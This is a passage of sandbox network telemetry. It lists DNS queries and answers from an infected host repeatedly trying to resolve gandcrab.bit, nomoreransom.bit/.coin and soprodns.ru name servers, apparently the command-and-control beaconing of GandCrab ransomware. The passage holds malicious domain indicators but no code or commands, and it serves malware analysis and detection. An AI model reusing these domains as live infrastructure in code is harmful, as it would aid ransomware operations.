                                      Aug 31, 2022 23:59:24.245595932 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:24.265731096 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:25.542416096 CEST192.168.2.38.8.8.80x72c8Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:26.630718946 CEST192.168.2.38.8.8.80x72c8Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:27.172085047 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:27.189977884 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:27.247838974 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:27.268862963 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:27.287358046 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:28.925348043 CEST192.168.2.38.8.8.80xbe66Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:30.260584116 CEST192.168.2.38.8.8.80xbe66Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:30.844980955 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:30.866137028 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:30.884764910 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:30.905071974 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:30.923072100 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:32.225573063 CEST192.168.2.38.8.8.80xc8b1Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:32.305984020 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:32.323930025 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:32.344903946 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:32.365597963 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:32.396919012 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:33.635987043 CEST192.168.2.38.8.8.80x6b6bStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:34.632500887 CEST192.168.2.38.8.8.80x6b6bStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:35.644903898 CEST192.168.2.38.8.8.80x6b6bStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:36.543714046 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:36.563648939 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:36.584182024 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:36.602427959 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:36.620733023 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:37.851984024 CEST192.168.2.38.8.8.80xbe0fStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:38.863599062 CEST192.168.2.38.8.8.80xbe0fStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:39.448174953 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:39.465929985 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:39.484544992 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:39.503390074 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:39.521467924 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:40.790900946 CEST192.168.2.38.8.8.80x3976Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:40.836529016 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:40.854235888 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:40.874320984 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:40.892307043 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:40.910653114 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:42.179858923 CEST192.168.2.38.8.8.80x94a7Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:42.235496044 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:42.262891054 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:42.281209946 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:42.301537037 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:42.322125912 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:43.590250015 CEST192.168.2.38.8.8.80x70aeStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:44.583146095 CEST192.168.2.38.8.8.80x70aeStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:45.599035978 CEST192.168.2.38.8.8.80x70aeStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:45.651026011 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:45.671057940 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:45.691448927 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:45.711695910 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:45.737027884 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:47.058562040 CEST192.168.2.38.8.8.80xed4Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:48.075234890 CEST192.168.2.38.8.8.80xed4Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:48.150029898 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:48.168544054 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:48.189199924 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:48.220005989 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:48.239259958 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:49.506455898 CEST192.168.2.38.8.8.80xae84Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:50.521322966 CEST192.168.2.38.8.8.80xae84Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:50.556144953 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:50.576560974 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:50.605078936 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:50.625201941 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:50.649034023 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:51.926340103 CEST192.168.2.38.8.8.80x4be7Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:51.969147921 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:51.989362001 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:52.023263931 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:52.043279886 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:52.063211918 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:53.315284014 CEST192.168.2.38.8.8.80x8b86Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:53.910933018 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:53.930680037 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:53.952245951 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:53.975918055 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:53.997132063 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:55.249011993 CEST192.168.2.38.8.8.80x1e6dStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:56.259572983 CEST192.168.2.38.8.8.80x1e6dStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:56.303123951 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:56.322889090 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:56.342972994 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:56.360950947 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:56.381031036 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:57.561789036 CEST192.168.2.38.8.8.80x2252Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:57.647419930 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:57.667177916 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:57.687539101 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:57.705862045 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:57.726016045 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:58.812098026 CEST192.168.2.38.8.8.80x82c8Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:59.818274021 CEST192.168.2.38.8.8.80x82c8Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:59.859764099 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:59.877731085 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:59.898864031 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:59.919053078 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:59.939438105 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Sep 1, 2022 00:00:01.037652969 CEST192.168.2.38.8.8.80xb09Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:02.037312031 CEST192.168.2.38.8.8.80xb09Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:02.080656052 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Sep 1, 2022 00:00:02.100950956 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:02.120944977 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Sep 1, 2022 00:00:02.142087936 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:02.160962105 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Sep 1, 2022 00:00:03.267693043 CEST192.168.2.38.8.8.80xa990Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:03.353477001 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Sep 1, 2022 00:00:03.371157885 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:03.391253948 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Sep 1, 2022 00:00:03.411292076 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:03.431119919 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Sep 1, 2022 00:00:04.517784119 CEST192.168.2.38.8.8.80x31aStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:05.099412918 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Sep 1, 2022 00:00:05.118977070 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:05.138813972 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Sep 1, 2022 00:00:05.158775091 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:05.176877975 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Sep 1, 2022 00:00:06.266103029 CEST192.168.2.38.8.8.80xd96aStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:07.256401062 CEST192.168.2.38.8.8.80xd96aStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:07.412708044 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Sep 1, 2022 00:00:07.433896065 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:07.455720901 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Sep 1, 2022 00:00:07.481525898 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:07.502496004 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Sep 1, 2022 00:00:08.675157070 CEST192.168.2.38.8.8.80xa920Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:09.687948942 CEST192.168.2.38.8.8.80xa920Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:09.849908113 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Sep 1, 2022 00:00:09.867791891 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:09.889720917 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Sep 1, 2022 00:00:09.911396027 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:09.936009884 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Sep 1, 2022 00:00:11.257081985 CEST192.168.2.38.8.8.80xa868Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:11.291388988 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Sep 1, 2022 00:00:11.310934067 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:11.330852985 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Sep 1, 2022 00:00:11.350931883 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:11.371195078 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      Aug 31, 2022 23:58:04.649065018 CEST8.8.8.8192.168.2.30x837dName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:04.690844059 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:04.712151051 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:04.738368988 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:04.757306099 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:04.775638103 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:07.250682116 CEST8.8.8.8192.168.2.30xc956Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:07.311570883 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:07.330202103 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:07.351011992 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:07.383272886 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:07.404005051 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:14.937246084 CEST8.8.8.8192.168.2.30x17Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:15.000052929 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:15.024588108 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:15.043148041 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:15.064032078 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:15.082518101 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:18.234639883 CEST8.8.8.8192.168.2.30xbb4fName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:18.235239029 CEST8.8.8.8192.168.2.30xbb4fName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:18.303237915 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:18.324134111 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:18.344474077 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:18.363096952 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:18.391031981 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:18.899728060 CEST8.8.8.8192.168.2.30x17Server failure (2)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:21.646465063 CEST8.8.8.8192.168.2.30xccdbName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:21.675831079 CEST8.8.8.8192.168.2.30xccdbName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:21.698769093 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:21.720890999 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:21.744118929 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:21.768213034 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:21.789768934 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:24.804043055 CEST8.8.8.8192.168.2.30xea6eName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:24.869385004 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:24.904200077 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:24.924804926 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:24.943135023 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:24.964257956 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:27.255918026 CEST8.8.8.8192.168.2.30xa774Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:27.311678886 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:27.336108923 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:27.355282068 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:27.381726027 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:27.402415991 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:28.756191015 CEST8.8.8.8192.168.2.30xea6eServer failure (2)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:33.272780895 CEST8.8.8.8192.168.2.30xaf62Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:33.337179899 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:33.357716084 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:33.378457069 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:33.398911953 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:33.424699068 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:36.474462986 CEST8.8.8.8192.168.2.30xd7cbName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:36.549562931 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:36.570236921 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:36.600003004 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:36.618398905 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:36.638629913 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:39.644859076 CEST8.8.8.8192.168.2.30x3115Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:39.735524893 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
